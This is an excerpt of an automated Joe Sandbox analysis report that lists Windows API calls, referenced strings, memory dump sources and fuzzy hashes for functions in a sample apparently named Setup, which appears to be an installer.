• Instruction Fuzzy Hash: 0211ED39200100DFC704EFB8C940AAEB7A9BF54318F109679E960DBAA0DBB0D90487A2
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69DB3573
  • Part of subcall function 69D7579B: _memset.LIBCMT ref: 69D757CA
  • Part of subcall function 69D7579B: GetVersionExW.KERNEL32 ref: 69D757DF
  • Part of subcall function 69D7579B: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000001), ref: 69D757F5
  • Part of subcall function 69D7579B: VerSetConditionMask.KERNEL32(00000000,?,00000001,00000001), ref: 69D757FD
  • Part of subcall function 69D7579B: VerSetConditionMask.KERNEL32(00000000,?,00000020,00000001,?,00000001,00000001), ref: 69D75805
  • Part of subcall function 69D7579B: VerSetConditionMask.KERNEL32(00000000,?,00000010,00000001,?,00000020,00000001,?,00000001,00000001), ref: 69D7580D
  • Part of subcall function 69D7579B: VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 69D75818
Strings
• CSDReleaseType, xrefs: 69DB35CC
• SYSTEM\CurrentControlSet\Control\Windows, xrefs: 69DB35E1
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ConditionMask$Version$H_prolog3InfoVerify_memset
                                                                                                                                                                    • String ID: CSDReleaseType$SYSTEM\CurrentControlSet\Control\Windows
                                                                                                                                                                    • API String ID: 3830908078-406884543
                                                                                                                                                                    • Opcode ID: 0417722cdfc3b88be0da9e3e87249e09934956600f9e88dc545338582cac6bad
                                                                                                                                                                    • Instruction ID: a8d05657eab009e9a7ed021e4cb76f127eb2df16a862b42185ca8b794522e060
                                                                                                                                                                    • Opcode Fuzzy Hash: 0417722cdfc3b88be0da9e3e87249e09934956600f9e88dc545338582cac6bad
                                                                                                                                                                    • Instruction Fuzzy Hash: 6A01A5F6D10128ABDB14CF58C8116A83B90BB11394F068175FD69EF651C739DA44D7E1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

APIs
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?,69DAFA6E,?,?,?,?,?,?,69DB34F1,69DAFA6E,000000FF), ref: 69DB1637
• GetLastError.KERNEL32(?,69DAFA6E,?,?,?,?,?,?,69DB34F1,69DAFA6E,000000FF,?,?,00000738,69DAFA6E,?), ref: 69DB1647
  • Part of subcall function 69D77479: __EH_prolog3.LIBCMT ref: 69D77480
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: DiskErrorFreeH_prolog3LastSpace
• String ID: GetDiskFreeSpaceEx
• API String ID: 3776785849-3355056173
• Opcode ID: 3d3522148b4631268f037940855427a59cab28eda5d2c60f99f094890b3a6008
• Instruction ID: c50ecc852bcbbef05184b248a87a80c7c7a1ebd6d78919d24d78b22df4095356
• Opcode Fuzzy Hash: 3d3522148b4631268f037940855427a59cab28eda5d2c60f99f094890b3a6008
• Instruction Fuzzy Hash: BC0128B6900219FB8B00DF98D9458EEBBB9EB98710F108459E905F7210D770AB09CBE0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69DAEC61
  • Part of subcall function 69DA3B2B: __EH_prolog3.LIBCMT ref: 69DA3B32
  • Part of subcall function 69DA3B2B: InitializeCriticalSection.KERNEL32(00000002,?,00000000,00000000,00000002,?,?,00000000,?,?,?,?,00000008,69DAEC79,?,?), ref: 69DA3BC9
  • Part of subcall function 69DB2C16: PathFileExistsW.SHLWAPI(00000000), ref: 69DB2CA8
  • Part of subcall function 69DB2C16: __CxxThrowException@8.LIBCMT ref: 69DB2CE7
  • Part of subcall function 69DB2C16: CopyFileW.KERNEL32(00000010,00000000,00000000,?), ref: 69DB2D19
  • Part of subcall function 69DB2C16: SetFileAttributesW.KERNEL32(?,00000080), ref: 69DB2D32
• InitializeCriticalSection.KERNEL32(?,?,?,.html,00000001,00000000,69DA747C,00000000,00000000,?,?,?,?,?,?,?), ref: 69DAECBB
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: File$CriticalH_prolog3InitializeSection$AttributesCopyException@8ExistsPathThrow
• String ID: .html
• API String ID: 4277916732-2179875201
• Opcode ID: eca68472a08309efefbaa2c0df8179e3af182479e6264e886300bfd3482815c1
• Instruction ID: d301b9ecbf354ba2a04ed9b32618f6f7e4cb14e293a4b2cf40531702cb34e0ea
• Opcode Fuzzy Hash: eca68472a08309efefbaa2c0df8179e3af182479e6264e886300bfd3482815c1
• Instruction Fuzzy Hash: 18F0C279600241EBDB00DFA4C544BDCBB6A7F2430CF40D038D50467A40CB74AA1DE7B2
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,80000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 698E6636
• SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,698E72CF), ref: 698E6648
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: Window$Create
• String ID: tooltips_class32
• API String ID: 870168347-1918224756
• Opcode ID: 7547cf8f2065cf1403be3672305bf980b3c8b87ed53567a11caef222d7e95414
• Instruction ID: 943fed8238d4526e4d073f244db319bbb9532fc2fb4d40c42652e331b8f9660f
• Opcode Fuzzy Hash: 7547cf8f2065cf1403be3672305bf980b3c8b87ed53567a11caef222d7e95414
• Instruction Fuzzy Hash: 57E042B1547171BEE6745A6AAC0CFE76E9CEF8B6B0F214218B92CE21C1C6245914C7F0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69DB02AA
• GetCommandLineW.KERNEL32(0000001C,69DA9382,02602230,69D6A794,?,69D7BFC7,00000018,69D7BC3C,02602254,?,?,?,?,?,?,UserExperienceDataCollection), ref: 69DB02AF
  • Part of subcall function 69D73E77: __EH_prolog3.LIBCMT ref: 69D73E7E
  • Part of subcall function 69D73A16: __EH_prolog3.LIBCMT ref: 69D73A1D
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3$CommandLine
• String ID: CEIPconsent
• API String ID: 1384747822-2245497618
• Opcode ID: 9d7b07cfed6809400b7bc3c7139bab2bfa80ab96e2b76abe56b8cb00afcf8b2c
• Instruction ID: 6d8b885e94cba9548238ea9e4649c15e76ccb747c36e2d0b2e3a790b5819ab19
• Opcode Fuzzy Hash: 9d7b07cfed6809400b7bc3c7139bab2bfa80ab96e2b76abe56b8cb00afcf8b2c
• Instruction Fuzzy Hash: 5AE08C7A980249AAEF10EBE0C804BCCB3A85F19208F94A430E200BB940CB28D20C8B70
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69DBA1ED
                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(00000020,69D953D9,00000000,?,?,69DA4B23), ref: 69DBA1FD
                                                                                                                                                                      • Part of subcall function 69D95238: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 69D95254
                                                                                                                                                                      • Part of subcall function 69D95238: _memset.LIBCMT ref: 69D9526E
                                                                                                                                                                      • Part of subcall function 69D95238: Process32FirstW.KERNEL32(00000000,?), ref: 69D95288
                                                                                                                                                                      • Part of subcall function 69D95238: FindCloseChangeNotification.KERNEL32(00000000), ref: 69D952B7
                                                                                                                                                                      • Part of subcall function 69DC8EAB: _memcpy_s.LIBCMT ref: 69DC8EFC
                                                                                                                                                                      • Part of subcall function 69DA8608: __wcsicoll.LIBCMT ref: 69DA8626
                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,00000000,69DA4B23,69DA4614,69DA4B23,00000000,00000010,00000010,?,00000000,69DA4614,?,?,69DA4B23), ref: 69DBA415
                                                                                                                                                                      • Part of subcall function 69D95238: Process32NextW.KERNEL32(00000000,0000022C), ref: 69D952A3
                                                                                                                                                                      • Part of subcall function 69DC8AFC: _wcsnlen.LIBCMT ref: 69DC8B0C
                                                                                                                                                                      • Part of subcall function 69D9531E: __EH_prolog3.LIBCMT ref: 69D95325
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3Process32$ChangeCloseCreateCurrentFindFirstNextNotificationPathProcessSnapshotTempToolhelp32__wcsicoll_memcpy_s_memset_wcsnlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3672672585-0
                                                                                                                                                                    • Opcode ID: a66b11d7da70d124429b4453696e958c6160907fd5ef8929744d252e1ad324eb
                                                                                                                                                                    • Instruction ID: e0fd0ff0444d1b73ea3e0fdafa73168ba2e5cc1b79bf4206c491ef504d50cba0
                                                                                                                                                                    • Opcode Fuzzy Hash: a66b11d7da70d124429b4453696e958c6160907fd5ef8929744d252e1ad324eb
                                                                                                                                                                    • Instruction Fuzzy Hash: 08915CB5900244DFDB00DFB8C949AEDBBB8AF05328F1496B8E450EB795DB349904CB72
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 698F558B
                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,00000024,698DF18B,?), ref: 698F559B
                                                                                                                                                                      • Part of subcall function 698DEFE2: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 698DEFFE
                                                                                                                                                                      • Part of subcall function 698DEFE2: _memset.LIBCMT ref: 698DF018
                                                                                                                                                                      • Part of subcall function 698DEFE2: Process32FirstW.KERNEL32(00000000,?), ref: 698DF032
                                                                                                                                                                      • Part of subcall function 698DEFE2: FindCloseChangeNotification.KERNEL32(00000000), ref: 698DF061
                                                                                                                                                                      • Part of subcall function 698F83FD: _memcpy_s.LIBCMT ref: 698F844E
                                                                                                                                                                      • Part of subcall function 698EEB56: __wcsicoll.LIBCMT ref: 698EEB74
                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?,?,00000010,?,00000000,?,?,?,?,00000024,698DF18B,?), ref: 698F57AE
                                                                                                                                                                      • Part of subcall function 698DEFE2: Process32NextW.KERNEL32(00000000,0000022C), ref: 698DF04D
                                                                                                                                                                      • Part of subcall function 698DF0C8: __EH_prolog3.LIBCMT ref: 698DF0CF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3Process32$ChangeCloseCreateCurrentFindFirstNextNotificationPathProcessSnapshotTempToolhelp32__wcsicoll_memcpy_s_memset
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4125857435-0
                                                                                                                                                                    • Opcode ID: dbcdd1cf38cacb220a6b770580bfa38c93f4484c6ab653eba4844b821539e63b
                                                                                                                                                                    • Instruction ID: 2c9a179f43e089e3b198c78f0a6297cdce13b1b9e3de259a77e2ddbed466fbc4
                                                                                                                                                                    • Opcode Fuzzy Hash: dbcdd1cf38cacb220a6b770580bfa38c93f4484c6ab653eba4844b821539e63b
                                                                                                                                                                    • Instruction Fuzzy Hash: 80916F75810208CFDB00DFBCC949BADBBB4EF15358F14AA5DE061A7291D7349909CBA5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69DB9893
                                                                                                                                                                    • GetCommandLineW.KERNEL32(0000002C,69DBD52A,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69DB98B4
                                                                                                                                                                      • Part of subcall function 69D73E77: __EH_prolog3.LIBCMT ref: 69D73E7E
                                                                                                                                                                      • Part of subcall function 69D74412: __EH_prolog3.LIBCMT ref: 69D74419
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69D753D4: ExpandEnvironmentStringsW.KERNEL32(?,?,00000105,00000010,69DFEE70,?,?,?,?,69DB995C,00000000,?,UiInfo.xml,?,?,00000000), ref: 69D75412
                                                                                                                                                                      • Part of subcall function 69D753D4: ExpandEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,?,69DB995C,00000000,?,UiInfo.xml,?,?,00000000,?), ref: 69D75440
                                                                                                                                                                    • PathIsRelativeW.SHLWAPI(?,?,?,00000000,?,UiInfo.xml,?,?,00000000,?), ref: 69DB996E
                                                                                                                                                                      • Part of subcall function 69D75D3F: __EH_prolog3.LIBCMT ref: 69D75D46
                                                                                                                                                                      • Part of subcall function 69D75D3F: GetModuleFileNameW.KERNEL32(69D50000,00000010,00000104,?,69DA831D,00000000), ref: 69D75D93
                                                                                                                                                                      • Part of subcall function 69DA8E4A: PathAppendW.SHLWAPI(00000000,?,?,?,?,?,69DB99FD,00000000,00000000,?,?,?,00000000,?,UiInfo.xml), ref: 69DA8E6E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$EnvironmentExpandPathStrings$AppendCommandFileLineModuleNameRelative
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 168041992-0
                                                                                                                                                                    • Opcode ID: 06268527965744dc0b8702c84e6c6fa2176a9e7dce17232f83c0bd7a50e6acb7
                                                                                                                                                                    • Instruction ID: 5fb3031b53d46cc1b8525732cc22064d4e10aaf256becd1beba461675a61aa76
                                                                                                                                                                    • Opcode Fuzzy Hash: 06268527965744dc0b8702c84e6c6fa2176a9e7dce17232f83c0bd7a50e6acb7
                                                                                                                                                                    • Instruction Fuzzy Hash: 4C417D76900289DBDF11DBF8C844AEDBBB9BF05318F149265E020EB791CB78DA058772
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • RegOpenKeyExW.KERNEL32(?,?,00000000,-00020018,69A72E5E,?,?,00000000,?,?,?,69A72E5E,80000002,Software\Microsoft\SQMClient,MachineId,?), ref: 69A71897
                                                                                                                                                                    • RegQueryValueExW.KERNEL32(69A72E5E,?,00000000,00000027,80000002,?,?,00000000,?,?,?,69A72E5E,80000002,Software\Microsoft\SQMClient,MachineId,?), ref: 69A718B3
                                                                                                                                                                    • RegCloseKey.KERNEL32(69A72E5E,?,00000000,?,?,?,69A72E5E,80000002,Software\Microsoft\SQMClient,MachineId,?,00000027), ref: 69A718D1
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207935822.0000000069A71000.00000020.00000001.01000000.0000000F.sdmp, Offset: 69A70000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207888905.0000000069A70000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208013345.0000000069A90000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208074023.0000000069A91000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69a70000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3677997916-0
                                                                                                                                                                    • Opcode ID: b9c52ee2bd43915fd0844a3852cf38602c4d57a30cbf23224a51f6763cfcdcfc
                                                                                                                                                                    • Instruction ID: 6aeb296343db2d5dacefd7ae087b60b4cea2efc66e345ae709417fec5cb7b8e2
                                                                                                                                                                    • Opcode Fuzzy Hash: b9c52ee2bd43915fd0844a3852cf38602c4d57a30cbf23224a51f6763cfcdcfc
                                                                                                                                                                    • Instruction Fuzzy Hash: B131BD3A514395AFDB208F54C996EAA7BECBB11B84F1440A9FD11AF1A0D331CAC59B90
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$AllocFreeH_prolog3
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2967515224-0
                                                                                                                                                                    • Opcode ID: 08f1efb5e1c433d93b95b893e335f6add7155a38291f613c6f75cb6af7a706f5
                                                                                                                                                                    • Instruction ID: 56705f5b0ab83fe7be9f684eeee715682e648ffc95d41fd7943c49192346566d
                                                                                                                                                                    • Opcode Fuzzy Hash: 08f1efb5e1c433d93b95b893e335f6add7155a38291f613c6f75cb6af7a706f5
                                                                                                                                                                    • Instruction Fuzzy Hash: 5D314771A00249EFCF10DFA8C98899DBBB5BF09314F6085B8E965EF690C7319A45CB10
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __recalloc$H_prolog3
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 59120599-0
                                                                                                                                                                    • Opcode ID: 724f4f2f8bf5cff11656c41fb6896dfcf9b5d90d4be91329f4ca65f6a32441d5
                                                                                                                                                                    • Instruction ID: 3ef4229c7d5f3057f9e84eefe9e55001b350953418fb612e038e0540ab89b01f
                                                                                                                                                                    • Opcode Fuzzy Hash: 724f4f2f8bf5cff11656c41fb6896dfcf9b5d90d4be91329f4ca65f6a32441d5
                                                                                                                                                                    • Instruction Fuzzy Hash: 571109756002029FE710CF69D991B1AB7E5FB24754F109C2CE9EACB365EB31E8428B50
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

APIs
• CreateThread.KERNEL32(00000000,00000000,Function_0001DFAB,?,00000000,00000000), ref: 698EDF5E
  • Part of subcall function 698F03F5: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,00000064,000004FF), ref: 698F0415
  • Part of subcall function 698F03F5: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 698F042B
  • Part of subcall function 698F03F5: TranslateMessage.USER32(?), ref: 698F0435
  • Part of subcall function 698F03F5: DispatchMessageW.USER32(?), ref: 698F043F
  • Part of subcall function 698F03F5: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 698F044E
• GetExitCodeThread.KERNEL32(00000000,000000FF), ref: 698EDF77
• CloseHandle.KERNEL32(00000000), ref: 698EDF7E
  • Part of subcall function 698ECB21: __EH_prolog3.LIBCMT ref: 698ECB28
  • Part of subcall function 698ECB21: DestroyIcon.USER32(?,00000004), ref: 698ECB50
  • Part of subcall function 698ECB21: DestroyIcon.USER32(?,00000004), ref: 698ECB5D
  • Part of subcall function 698ECB21: DestroyIcon.USER32(?,00000004), ref: 698ECB6A
  • Part of subcall function 698ECB21: DestroyIcon.USER32(?,00000004), ref: 698ECB77
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: DestroyIconMessage$PeekThread$CloseCodeCreateDispatchExitH_prolog3HandleMultipleObjectsTranslateWait
• String ID:
• API String ID: 1402139836-0
• Opcode ID: d8f38af1225a17b54db2bbee0bb8400ce19543234b33c5f12aa6d3e4cfba9410
• Instruction ID: 2f5b623368e0de410206a68fbf9aa14caa13ab749797f72b9b506a11c4100080
• Opcode Fuzzy Hash: d8f38af1225a17b54db2bbee0bb8400ce19543234b33c5f12aa6d3e4cfba9410
• Instruction Fuzzy Hash: 71016176504204AFCB04DF64DC08CABBBA9EF85224F00CA1DF865DB150D731D91ACBE2
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: __recalloc$H_prolog3
• String ID:
• API String ID: 59120599-0
• Opcode ID: e9ff190cf8314778615c3ca2f78e252f1967bf5858aec950105d954de04b4c78
• Instruction ID: 692d3aacf019a1e40c9832f34e98f7d1ae3755e0d3a9b188a7459748be979f8a
• Opcode Fuzzy Hash: e9ff190cf8314778615c3ca2f78e252f1967bf5858aec950105d954de04b4c78
• Instruction Fuzzy Hash: DC0129B5640602DFEB10DF68C941B6677E4FB24604F109838DAA6CBB54D730E805CB50
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetTokenInformation.KERNELBASE(?,69A7332F(TokenIntegrityLevel),00000000,00000000,00000000,00000000,00000000,?,?,69A736C7,?,00000001), ref: 69A72835
